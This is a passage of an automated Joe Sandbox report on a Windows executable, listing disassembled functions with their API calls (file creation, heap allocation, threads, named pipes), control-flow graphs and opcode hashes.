                      • Part of subcall function 004053B5: InitializeCriticalSection.KERNEL32(00418708,0040107B,00000000,00001000,00000000,00000000), ref: 004053BA
                    • GetStdHandle.KERNEL32(FFFFFFF5,00000000,00001000,00000000,00000000), ref: 0040109A
                      • Part of subcall function 0040A460: HeapAlloc.KERNEL32(00000000,0000003C,00000200,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000,00000000), ref: 0040A47F
                      • Part of subcall function 0040A460: HeapAlloc.KERNEL32(00000008,00000015,?,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000,00000000), ref: 0040A4A5
                      • Part of subcall function 0040A460: HeapAlloc.KERNEL32(00000008,FFFFFFED,FFFFFFED,00000010,00010000,00000004,00000200,?,?,?,?,004010C3,00000004,00000015,00000000,00000200), ref: 0040A502
                      • Part of subcall function 0040AA5A: HeapFree.KERNEL32(00000000,?,?,?,00000000,?,?,?,004010CE,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000), ref: 0040AA98
                      • Part of subcall function 0040AA5A: HeapFree.KERNEL32(00000000,?,?,00000000,?,?,?,004010CE,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000), ref: 0040AAB1
                      • Part of subcall function 0040AA5A: HeapFree.KERNEL32(00000000,00000000,?,00000000,?,?,?,004010CE,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000), ref: 0040AABB
                      • Part of subcall function 0040A9C8: HeapAlloc.KERNEL32(00000000,00000034,?,?,?,004010E9,00000008,00000000,0041706C,00000007,00000004,00000015,00000000,00000200,00000200,FFFFFFF5), ref: 0040A9DB
                      • Part of subcall function 0040A9C8: HeapAlloc.KERNEL32(FFFFFFF5,00000008,?,?,?,004010E9,00000008,00000000,0041706C,00000007,00000004,00000015,00000000,00000200,00000200,FFFFFFF5), ref: 0040A9F0
                      • Part of subcall function 0040E266: RtlAllocateHeap.NTDLL(00000000,FFFFFFDD,?,00000200,?,?,?,0040112D,0000000C,000186A1,00000007,00417074,004180F0,00000004,00000000,00417064), ref: 0040E296
                      • Part of subcall function 0040E266: memset.MSVCRT ref: 0040E2D1
                    • SetConsoleCtrlHandler.KERNEL32(00000000,00000001,00000004,00000000,00417064,00000008,0000000C,000186A1,00000007,00417074,004180F0,00000004,00000000,00417064,00000008,00000008), ref: 0040116F
                      • Part of subcall function 0040E520: GetLastError.KERNEL32(00001000,00000000,00000000), ref: 0040E526
                      • Part of subcall function 0040E520: TlsGetValue.KERNEL32(0000000D), ref: 0040E535
                      • Part of subcall function 0040E520: SetLastError.KERNEL32(?), ref: 0040E54B
                      • Part of subcall function 0040E560: TlsGetValue.KERNEL32(0000000D,00000000,00000000), ref: 0040E56C
                      • Part of subcall function 0040E560: RtlAllocateHeap.NTDLL(02200000,00000000,?), ref: 0040E599
                      • Part of subcall function 00401BA0: LoadLibraryExW.KERNEL32(00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,0040119C,004180A0,00000000), ref: 00401BDE
                      • Part of subcall function 00401BA0: EnumResourceTypesW.KERNEL32(00000000,00000000,00000000), ref: 00401BFB
                      • Part of subcall function 00401BA0: FreeLibrary.KERNEL32(?,00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,0040119C,004180A0), ref: 00401C03
                    • HeapDestroy.KERNEL32(00000000,004180A0,00000000,00000000,00000000,00000001,00000004,00000000,00417064,00000008,0000000C,000186A1,00000007,00417074,004180F0,00000004), ref: 004011C6
                    • ExitProcess.KERNEL32(00000000,004180A0,00000000,00000000,00000000,00000001,00000004,00000000,00417064,00000008,0000000C,000186A1,00000007,00417074,004180F0,00000004), ref: 004011CB
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.3241664003.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.3238898610.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3246045104.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3252525845.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3256164934.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: Heap$Alloc$Free$CreateInitializememset$AllocateCriticalErrorHandleLastLibrarySectionValue$CommonConsoleControlsCtrlDestroyEnumExitHandlerInitLoadModuleProcessResourceTypes
                    • String ID: .pA$:pA$|pA
                    • API String ID: 1832782000-3272395972
                    • Opcode ID: 11f145e1b951a2c6a28e78b56360a089cdbe7b1a81af6c9d6466caa6387cbb0c
                    • Instruction ID: c3718d3f77f1aa7f822ccfb4f0aafd009571b65037601bc21910cdbb085b96b1
                    • Opcode Fuzzy Hash: 11f145e1b951a2c6a28e78b56360a089cdbe7b1a81af6c9d6466caa6387cbb0c
                    • Instruction Fuzzy Hash: 77313271680704A9E200B7B39C47F9E3A18AB1874CF11883FB744790E3DEBC55584A6F
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0040B140 Relevance: 9.2, APIs: 6, Instructions: 157filememoryCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 243 40b140-40b156 244 40b160-40b173 call 40db18 243->244 245 40b158 243->245 248 40b322-40b32b 244->248 249 40b179-40b180 244->249 245->244 250 40b182-40b18a 249->250 251 40b1be-40b1c1 249->251 252 40b191-40b197 250->252 253 40b18c 250->253 254 40b1c3-40b1cb 251->254 255 40b1fc-40b1ff 251->255 256 40b199 252->256 257 40b19c-40b1b9 CreateFileW 252->257 253->252 258 40b1d2-40b1d8 254->258 259 40b1cd 254->259 260 40b201-40b20d 255->260 261 40b268 255->261 256->257 264 40b26c-40b26f 257->264 265 40b1da 258->265 266 40b1dd-40b1fa CreateFileW 258->266 259->258 262 40b218-40b21e 260->262 263 40b20f-40b214 260->263 261->264 267 40b220-40b223 262->267 268 40b227-40b247 CreateFileW 262->268 263->262 269 40b275-40b277 264->269 270 40b30b 264->270 265->266 266->264 267->268 268->269 271 40b249-40b266 CreateFileW 268->271 269->270 273 40b27d-40b284 269->273 272 40b30f-40b312 270->272 271->264 274 40b314 272->274 275 40b316-40b31d call 40da8a 272->275 276 40b2a2 273->276 277 40b286-40b28c 273->277 274->275 275->248 280 40b2a5-40b2d2 276->280 277->276 279 40b28e-40b2a0 HeapAlloc 277->279 279->280 281 40b2f0-40b2f9 280->281 282 40b2d4-40b2da 280->282 283 40b2fb 281->283 284 40b2fd-40b2ff 281->284 282->281 285 40b2dc-40b2ea SetFilePointer 282->285 283->284 284->272 286 40b301-40b30a 284->286 285->281
                    APIs
                    • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,?,?,00000000,00000000), ref: 0040B1B1
                    • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000004,00000080,00000000,?,?,?,?,00000000,00000000), ref: 0040B1F2
                    • CreateFileW.KERNELBASE(?,C0000000,00000000,00000000,00000002,00000080,00000000,?,?,?,?,00000000,00000000), ref: 0040B23C
                    • CreateFileW.KERNEL32(?,40000000,?,00000000,00000005,00000000,00000000,?,?,?,00000000,00000000), ref: 0040B25E
                    • HeapAlloc.KERNEL32(00000000,00001000,?,?,?,?,00000000,00000000), ref: 0040B297
                    • SetFilePointer.KERNEL32(?,00000000,?,00000002), ref: 0040B2EA
                    Memory Dump Source
                    • Source File: 00000000.00000002.3241664003.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.3238898610.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3246045104.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3252525845.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3256164934.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: File$Create$AllocHeapPointer
                    • String ID:
                    • API String ID: 4207849991-0
                    • Opcode ID: 1dd6c58127759367adb822d4a0e0d9138a9c495b34507b1400e0ba0402d2ad51
                    • Instruction ID: 8d8b4ccba24edc48a090e0818cc57ca2d498b7de68d829e88f81714118269cc7
                    • Opcode Fuzzy Hash: 1dd6c58127759367adb822d4a0e0d9138a9c495b34507b1400e0ba0402d2ad51
                    • Instruction Fuzzy Hash: D251B171244301ABE3208E15DC49B6BBAE5EB44764F24493EFD81A63E0D779E8458B8D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0040DE99 Relevance: 7.6, APIs: 5, Instructions: 106memoryCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 287 40de99-40deb8 288 40deba-40debc 287->288 289 40debe-40dec0 287->289 288->289 290 40df72-40df85 RtlAllocateHeap 289->290 291 40dec6-40decb 289->291 293 40df87-40dfa5 290->293 294 40dfbd-40dfc3 290->294 292 40ded0 call 40e0c3 291->292 295 40ded5-40dee9 EnterCriticalSection 292->295 296 40dfb0-40dfb7 InitializeCriticalSection 293->296 297 40dfa7-40dfa9 293->297 298 40def7-40def9 295->298 296->294 297->296 299 40dfab-40dfae 297->299 300 40deeb-40deee 298->300 301 40defb 298->301 299->294 303 40def0-40def3 300->303 304 40def5 300->304 302 40df07-40df1b HeapAlloc 301->302 305 40df65-40df70 LeaveCriticalSection 302->305 306 40df1d-40df2f call 40de99 302->306 303->304 307 40defd-40df05 303->307 304->298 305->294 309 40df34-40df38 306->309 307->302 307->305 309->305 310 40df3a-40df5a 309->310 311 40df5c 310->311 312 40df5f 310->312 311->312 312->305
                    APIs
                    • EnterCriticalSection.KERNEL32(00418684,0041867C,0040E062,00000000,FFFFFFED,00000200,76EC5E70,0040A4F6,FFFFFFED,00000010,00010000,00000004,00000200), ref: 0040DEDA
                    • HeapAlloc.KERNEL32(00000000,00000018,?,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000,00000000), ref: 0040DF11
                    • LeaveCriticalSection.KERNEL32(00418684,?,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000,00000000,00000000), ref: 0040DF6A
                    • RtlAllocateHeap.NTDLL(00000000,00000038,00000000,FFFFFFED,00000200,76EC5E70,0040A4F6,FFFFFFED,00000010,00010000,00000004,00000200), ref: 0040DF7B
                    • InitializeCriticalSection.KERNEL32(00000020,?,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000,00000000,00000000), ref: 0040DFB7
                    Memory Dump Source
                    • Source File: 00000000.00000002.3241664003.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.3238898610.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3246045104.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3252525845.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3256164934.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: CriticalSection$Heap$AllocAllocateEnterInitializeLeave
                    • String ID:
                    • API String ID: 1272335518-0
                    • Opcode ID: d472077d75a53df2d0dde7d61b18959a765d34bb65c31e97d0a70733ac938e24
                    • Instruction ID: e12e1174ac54fca87ec7e67201d5359a366fc17122bfc308660e030bf91fb77e
                    • Opcode Fuzzy Hash: d472077d75a53df2d0dde7d61b18959a765d34bb65c31e97d0a70733ac938e24
                    • Instruction Fuzzy Hash: 90318D71940B069BC3208F95D844A52FBF0FB44720B19C93EE446A77A0DB78E908CB99
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00403F53 Relevance: 7.6, APIs: 3, Strings: 1, Instructions: 571COMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 313 403f53-403f54 314 403f59-403f64 313->314 314->314 315 403f66-403f7c call 40e660 314->315 318 403f7e-403f86 315->318 319 403f88-403fea call 40e520 * 2 call 405dc0 call 40e560 call 40e520 call 40e6c0 * 2 call 40e560 318->319 320 403fec-403ffd 318->320 319->318 319->320 322 403fff-404007 320->322 324 404009-40406b call 40e520 * 2 call 405dc0 call 40e560 call 40e520 call 40e6c0 * 2 call 40e560 322->324 325 40406d-40407e 322->325 324->322 324->325 328 404080-404088 325->328 329 40408a-4040ec call 40e520 * 2 call 405dc0 call 40e560 call 40e520 call 40e6c0 * 2 call 40e560 328->329 330 4040ee-4040ff 328->330 329->328 329->330 335 404101-404109 330->335 340 40410b-40416d call 40e520 * 2 call 405dc0 call 40e560 call 40e520 call 40e6c0 * 2 call 40e560 335->340 341 40416f-404180 335->341 340->335 340->341 346 404182-40418a 341->346 351 4041f0-404201 346->351 352 40418c-4041e6 call 40e520 * 2 call 405dc0 call 40e560 call 40e520 call 40e6c0 * 2 call 40e560 346->352 358 404203-40420b 351->358 471 4041eb-4041ee 352->471 364 404275-404286 358->364 365 40420d-404273 call 40e520 * 2 call 405dc0 call 40e560 call 40e520 call 40e6c0 * 2 call 40e560 358->365 372 404288-404290 364->372 365->358 365->364 379 404292-4042f8 call 40e520 * 2 call 405dc0 call 40e560 call 40e520 call 40e6c0 * 2 call 40e560 372->379 380 4042fa-40430b 372->380 379->372 379->380 388 40430d-404315 380->388 396 404317-404375 call 40e520 * 2 call 405dc0 call 40e560 call 40e520 call 40e6c0 * 2 call 40e560 388->396 397 40437f-404390 388->397 500 40437a-40437d 396->500 399 404392-40439a 397->399 409 404404-4045ee call 40e520 call 40e6c0 * 2 call 40e560 call 40e520 call 403221 call 40e560 call 40985e GetModuleHandleW call 40e520 * 4 call 40d780 call 405182 call 405eb0 call 40e560 call 40e520 * 4 call 40d780 call 405182 call 405eb0 call 40e560 call 402e49 call 40e520 call 402150 call 4051a0 call 40196c call 40469c call 40e520 call 405100 call 403539 call 40e560 PathRemoveBackslashW call 402068 call 40e520 * 2 call 402ba6 call 40e720 call 405182 call 4099a5 call 4051a0 call 40e520 call 40e6c0 * 2 call 40e560 call 403801 call 40e520 call 401e66 call 40e560 399->409 410 40439c-404402 call 40e520 * 2 call 405dc0 call 40e560 call 40e520 call 40e6c0 * 2 call 40e560 399->410 589 4045f0-404606 call 40548c 409->589 590 404608-40460c call 402c55 409->590 410->399 410->409 471->346 471->351 500->388 500->397 594 404611-404621 call 403c83 589->594 590->594 596 404626-40469b SetConsoleCtrlHandler call 401fba call 40e5f0 * 9 594->596
                    APIs
                      • Part of subcall function 0040E560: TlsGetValue.KERNEL32(0000000D,00000000,00000000), ref: 0040E56C
                      • Part of subcall function 0040E560: RtlAllocateHeap.NTDLL(02200000,00000000,?), ref: 0040E599
                      • Part of subcall function 0040E520: GetLastError.KERNEL32(00001000,00000000,00000000), ref: 0040E526
                      • Part of subcall function 0040E520: TlsGetValue.KERNEL32(0000000D), ref: 0040E535
                      • Part of subcall function 0040E520: SetLastError.KERNEL32(?), ref: 0040E54B
                      • Part of subcall function 0040E6C0: wcslen.MSVCRT ref: 0040E6D7
                      • Part of subcall function 0040E560: RtlReAllocateHeap.NTDLL(02200000,00000000,?,?), ref: 0040E5BC
                    • GetModuleHandleW.KERNEL32(00000000,?,?,?,00000000,00000000,?,02209F70,00000000,00000000), ref: 0040445B
                    • PathRemoveBackslashW.SHLWAPI(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,00000000), ref: 00404554
                      • Part of subcall function 00402BA6: GetShortPathNameW.KERNEL32(02209F70,02209F70,00002710), ref: 00402BE0
                      • Part of subcall function 0040E720: TlsGetValue.KERNEL32(0000000D,?,?,00401DDF,00000000,00000000,00000000,FFFFFFF5,00000200,0000000A,00000000,00000000,FFFFFFF5,00000015,00000001,00000000), ref: 0040E72A
                      • Part of subcall function 00405182: TlsGetValue.KERNEL32(00000000,00402F8A,00000000,00000008,00000001,00000000,00000000,00000000,00000000,00000000,?,00000200,00000000,00000000,00000000,00000000), ref: 00405189
                      • Part of subcall function 004099A5: SetEnvironmentVariableW.KERNEL32(02209F70,02209F70,00404594,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004099BE
                      • Part of subcall function 00401E66: PathQuoteSpacesW.SHLWAPI(?,00000000,00000000,00000000,00000000,00000000,00000000,-00000004,004045DB,00000000,00000000,00000000,02209F70,02208968,00000000,00000000), ref: 00401E9B
                    • SetConsoleCtrlHandler.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,02209F70,02208968,00000000,00000000,00000000), ref: 00404636
                      • Part of subcall function 0040548C: CreateThread.KERNEL32(00000000,00001000,?,?,00000000,02209F70), ref: 004054A5
                      • Part of subcall function 0040548C: EnterCriticalSection.KERNEL32(00418708,?,?,?,?,00402DD8,00000000,00000000,?,0000000A,?,00000000,00000001,00000000,00000000,00000000), ref: 004054B7
                      • Part of subcall function 0040548C: WaitForSingleObject.KERNEL32(00000008,00000000,00000000,?,?,?,?,00402DD8,00000000,00000000,?,0000000A,?,00000000,00000001,00000000), ref: 004054CE
                      • Part of subcall function 0040548C: CloseHandle.KERNEL32(00000008,?,?,?,?,00402DD8,00000000,00000000,?,0000000A,?,00000000,00000001,00000000,00000000,00000000), ref: 004054DA
                      • Part of subcall function 0040548C: LeaveCriticalSection.KERNEL32(00418708,?,?,?,?,00402DD8,00000000,00000000,?,0000000A,?,00000000,00000001,00000000,00000000,00000000), ref: 0040551D
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.3241664003.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.3238898610.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3246045104.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3252525845.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3256164934.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: Value$Path$AllocateCriticalErrorHandleHeapLastSection$BackslashCloseConsoleCreateCtrlEnterEnvironmentHandlerLeaveModuleNameObjectQuoteRemoveShortSingleSpacesThreadVariableWaitwcslen
                    • String ID: pA
                    • API String ID: 2577741277-3402996844
                    • Opcode ID: 50ce0f469a7665fb6dfd1afe813213fc97d1f4cade5af18fd151faefa158c23f
                    • Instruction ID: 999f5745f1e250978be3a13d4136388ffeb6a971fca5c6bbec0ef146a0a58392
                    • Opcode Fuzzy Hash: 50ce0f469a7665fb6dfd1afe813213fc97d1f4cade5af18fd151faefa158c23f
                    • Instruction Fuzzy Hash: 4712FAB5504304BED600BBB29C8197F77BCEB89718F10CC3FB544A6192EA3CD9559B2A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00403C83 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 128COMMON
                    Download Yara Rule

                    Control-flow Graph

                    APIs
                      • Part of subcall function 0040E660: TlsGetValue.KERNEL32(0000000D,?,00402EF9,00000000,00000000,00000000,00000000,?,0040118D,00000000,00000000,00000000,00000001,00000004,00000000,00417064), ref: 0040E677
                      • Part of subcall function 0040E520: GetLastError.KERNEL32(00001000,00000000,00000000), ref: 0040E526
                      • Part of subcall function 0040E520: TlsGetValue.KERNEL32(0000000D), ref: 0040E535
                      • Part of subcall function 0040E520: SetLastError.KERNEL32(?), ref: 0040E54B
                      • Part of subcall function 0040E6C0: wcslen.MSVCRT ref: 0040E6D7
                      • Part of subcall function 0040E560: TlsGetValue.KERNEL32(0000000D,00000000,00000000), ref: 0040E56C
                      • Part of subcall function 0040E560: RtlAllocateHeap.NTDLL(02200000,00000000,?), ref: 0040E599
                    • PathQuoteSpacesW.SHLWAPI(00000000,00000000,022089E8,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00404626,00000000,00000000,00000000,?), ref: 00403CE6
                      • Part of subcall function 0040E560: RtlReAllocateHeap.NTDLL(02200000,00000000,?,?), ref: 0040E5BC
                    • PathQuoteSpacesW.SHLWAPI(?,00000000,00000000,0041702A,00000000,00000000,00000000,00000000,022089E8,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00403D1F
                      • Part of subcall function 0040AE75: GetCurrentDirectoryW.KERNEL32(00000104,00000000,00000104,00000000,?,?,0000000A,004037B6,00000000,00000000,00000000,?,00000000,00000000,00000000,00404746), ref: 0040AE8B
                      • Part of subcall function 0040E720: TlsGetValue.KERNEL32(0000000D,?,?,00401DDF,00000000,00000000,00000000,FFFFFFF5,00000200,0000000A,00000000,00000000,FFFFFFF5,00000015,00000001,00000000), ref: 0040E72A
                      • Part of subcall function 00405182: TlsGetValue.KERNEL32(00000000,00402F8A,00000000,00000008,00000001,00000000,00000000,00000000,00000000,00000000,?,00000200,00000000,00000000,00000000,00000000), ref: 00405189
                      • Part of subcall function 004098F7: WaitForSingleObject.KERNEL32(02209F70,00000000,?,?,?,00403DC7,?,00000000,00000000,00000000,0041702A,?,00000000,00000000,00000000,00000044), ref: 00409904
                      • Part of subcall function 004098F7: PeekNamedPipe.KERNEL32(?,00000000,00000000,00000000,02209F70,00000000,?,?,?,00403DC7,?,00000000,00000000,00000000,0041702A,?), ref: 00409921
                      • Part of subcall function 004056D8: timeBeginPeriod.WINMM(00000001,00403793,00000001,?,00000000,00417024,00000000,00000000,00000000,?,00000000,00000000,00000000,00404746,00000000,00000000), ref: 004056E3
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.3241664003.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.3238898610.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3246045104.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3252525845.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3256164934.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: Value$AllocateErrorHeapLastPathQuoteSpaces$BeginCurrentDirectoryNamedObjectPeekPeriodPipeSingleWaittimewcslen
                    • String ID: *pA$*pA
                    • API String ID: 2955313036-2893952571
                    • Opcode ID: 6f360bf5818642a08700f897070461880bdab54b83c1be6a7afe69dac29c3c04
                    • Instruction ID: 17d0f5624b42dd18ceef5440812bdbba4c8a787aaabb2d2d00a5c22853b10036
                    • Opcode Fuzzy Hash: 6f360bf5818642a08700f897070461880bdab54b83c1be6a7afe69dac29c3c04
                    • Instruction Fuzzy Hash: 4E41D875104205AAC600BF73DC8293F7669EFD4708F50CD3EB184361E2EA3D9D25AB6A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00401BA0 Relevance: 4.7, APIs: 3, Instructions: 233libraryCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    APIs
                      • Part of subcall function 0040E660: TlsGetValue.KERNEL32(0000000D,?,00402EF9,00000000,00000000,00000000,00000000,?,0040118D,00000000,00000000,00000000,00000001,00000004,00000000,00417064), ref: 0040E677
                      • Part of subcall function 0040E520: GetLastError.KERNEL32(00001000,00000000,00000000), ref: 0040E526
                      • Part of subcall function 0040E520: TlsGetValue.KERNEL32(0000000D), ref: 0040E535
                      • Part of subcall function 0040E520: SetLastError.KERNEL32(?), ref: 0040E54B
                      • Part of subcall function 00409698: GetModuleFileNameW.KERNEL32(00000000,00000104,00000104,00000000,?,?,?,00401BD6,00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000), ref: 004096B4
                      • Part of subcall function 00409698: wcscmp.MSVCRT ref: 004096C2
                      • Part of subcall function 00409698: memmove.MSVCRT ref: 004096DA
                      • Part of subcall function 00405182: TlsGetValue.KERNEL32(00000000,00402F8A,00000000,00000008,00000001,00000000,00000000,00000000,00000000,00000000,?,00000200,00000000,00000000,00000000,00000000), ref: 00405189
                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,0040119C,004180A0,00000000), ref: 00401BDE
                    • EnumResourceTypesW.KERNEL32(00000000,00000000,00000000), ref: 00401BFB
                    • FreeLibrary.KERNEL32(?,00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,0040119C,004180A0), ref: 00401C03
                      • Part of subcall function 0040E6C0: wcslen.MSVCRT ref: 0040E6D7
                      • Part of subcall function 0040E560: TlsGetValue.KERNEL32(0000000D,00000000,00000000), ref: 0040E56C
                      • Part of subcall function 0040E560: RtlAllocateHeap.NTDLL(02200000,00000000,?), ref: 0040E599
                    Memory Dump Source
                    • Source File: 00000000.00000002.3241664003.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.3238898610.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3246045104.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3252525845.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3256164934.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: Value$ErrorLastLibrary$AllocateEnumFileFreeHeapLoadModuleNameResourceTypesmemmovewcscmpwcslen
                    • String ID:
                    • API String ID: 983379767-0
                    • Opcode ID: 85bd719b3417c84e9721a3e665a4c187715772ca533533566ef874ce4e5cb792
                    • Instruction ID: 6d1e308804f6dc32779c3279b2fcfe03024d17212ecc119a6d6b7423f9e5f936
                    • Opcode Fuzzy Hash: 85bd719b3417c84e9721a3e665a4c187715772ca533533566ef874ce4e5cb792
                    • Instruction Fuzzy Hash: C951D7B66052007AE500BBB39D82D7F626DDBC571CB108C3FB440650E3EA3D9D616A6E
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0040B6A0 Relevance: 4.6, APIs: 3, Instructions: 102COMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 848 40b6a0-40b6b4 849 40b7a7-40b7ad 848->849 850 40b6ba-40b6be 848->850 851 40b6c0-40b6e8 SetFilePointer 850->851 852 40b6eb-40b6f5 850->852 851->852 853 40b6f7-40b702 852->853 854 40b768-40b773 call 40b0c0 852->854 855 40b753-40b765 853->855 856 40b704-40b705 853->856 863 40b795-40b7a2 854->863 864 40b775-40b792 WriteFile 854->864 858 40b707-40b70a 856->858 859 40b73c-40b750 856->859 861 40b727-40b739 858->861 862 40b70c-40b70d 858->862 865 40b711-40b724 memcpy 862->865 863->865
                    APIs
                    • SetFilePointer.KERNELBASE(?,?,?,00000001), ref: 0040B6D8
                    • memcpy.MSVCRT ref: 0040B712
                    Memory Dump Source
                    • Source File: 00000000.00000002.3241664003.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.3238898610.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3246045104.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3252525845.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3256164934.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: FilePointermemcpy
                    • String ID:
                    • API String ID: 1104741977-0
                    • Opcode ID: 02d62d909d0369cf033ef3da9330b5dd6b1d06cd86180aa2b8ba7b2c57c5f325
                    • Instruction ID: c1513f54f6ae5569788c36180188ddc2abd705510cfe10eedfb0010ba837d0d9
                    • Opcode Fuzzy Hash: 02d62d909d0369cf033ef3da9330b5dd6b1d06cd86180aa2b8ba7b2c57c5f325
                    • Instruction Fuzzy Hash: DA312A3A2047019FC320DF29D844E9BB7E5EFD8714F04882EE59A97750D335E919CBAA
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0040E900 Relevance: 4.6, APIs: 3, Instructions: 75memoryCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 866 40e900-40e919 TlsGetValue 867 40e924-40e93f 866->867 868 40e91b-40e921 866->868 869 40e941-40e972 RtlReAllocateHeap 867->869 870 40e974-40e97e 867->870 868->867 871 40e9bc-40e9dc 869->871 870->871 872 40e980-40e987 870->872 873 40e990-40e9ba HeapReAlloc 872->873 874 40e989 872->874 873->871 874->873
                    APIs
